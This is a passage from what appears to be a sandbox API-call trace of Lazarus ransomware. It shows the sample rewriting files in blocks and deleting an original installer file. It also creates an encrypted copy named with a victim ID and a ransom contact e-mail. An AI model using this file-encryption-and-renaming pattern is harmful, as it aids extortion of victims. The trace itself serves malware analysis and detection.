WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.704] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.704] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.705] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.705] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.705] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.705] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.705] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.705] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.705] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.706] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.706] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0077.706] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0077.706] CloseHandle (hObject=0x428) returned 1 [0077.859] CloseHandle (hObject=0x42c) returned 1 [0077.859] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0077.863] GetFileType (hFile=0x42c) returned 0x1 [0077.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0077.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0077.863] GetLastError () returned 0xb7 [0077.863] SetLastError (dwErrCode=0xb7) [0077.863] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0077.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0077.864] CloseHandle (hObject=0x42c) returned 1 [0077.865] AreFileApisANSI () returned 1 [0077.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0077.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0077.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 45 [0077.865] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0077.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.866] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x1, dwReserved1=0x0, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0077.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0077.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0077.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0077.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0077.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.867] AreFileApisANSI () returned 1 [0077.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\ParameterInfo.xml", lpUsedDefaultChar=0x0) returned 40 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0077.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0077.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0077.868] AreFileApisANSI () returned 1 [0077.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0077.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0077.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x6d528, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 40 [0077.868] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0077.868] GetFileType (hFile=0x42c) returned 0x1 [0077.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0077.868] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0077.868] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0077.869] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0077.869] CloseHandle (hObject=0x42c) returned 1 [0077.869] AreFileApisANSI () returned 1 [0077.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0077.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0077.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x6cfa8, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 40 [0077.869] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0077.869] GetFileType (hFile=0x42c) returned 0x1 [0077.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0077.869] CloseHandle (hObject=0x42c) returned 1 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0077.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0077.870] AreFileApisANSI () returned 1 [0077.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0077.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0077.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x6d268, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 40 [0077.870] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae)) returned 1 [0077.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0077.871] AreFileApisANSI () returned 1 [0077.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0077.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.871] GetLastError () returned 0x0 [0077.871] SetLastError (dwErrCode=0x0) [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x92460 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0077.871] GetLastError () returned 0x0 [0077.871] SetLastError (dwErrCode=0x0) [0077.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0077.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0077.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0077.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0077.872] AreFileApisANSI () returned 1 [0077.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0077.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xcc) returned 0x74280 [0077.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x74280, cchWideChar=102 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 102 [0077.872] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0077.872] GetFileType (hFile=0x42c) returned 0x1 [0077.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74280 | out: hHeap=0x20000) returned 1 [0077.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0077.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0077.872] AreFileApisANSI () returned 1 [0077.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0077.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0077.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6d268, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 40 [0077.873] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0077.873] GetFileType (hFile=0x428) returned 0x1 [0077.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0077.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0077.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0077.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0077.873] GetLastError () returned 0x0 [0077.873] SetLastError (dwErrCode=0x0) [0077.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0077.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0077.873] GetLastError () returned 0x0 [0077.873] SetLastError (dwErrCode=0x0) [0077.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0077.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0077.873] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0077.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0077.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0077.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x93678 [0077.876] GetLastError () returned 0x0 [0077.876] SetLastError (dwErrCode=0x0) [0077.876] GetLastError () returned 0x0 [0077.876] SetLastError (dwErrCode=0x0) [0077.876] GetLastError () returned 0x0 [0077.876] SetLastError (dwErrCode=0x0) 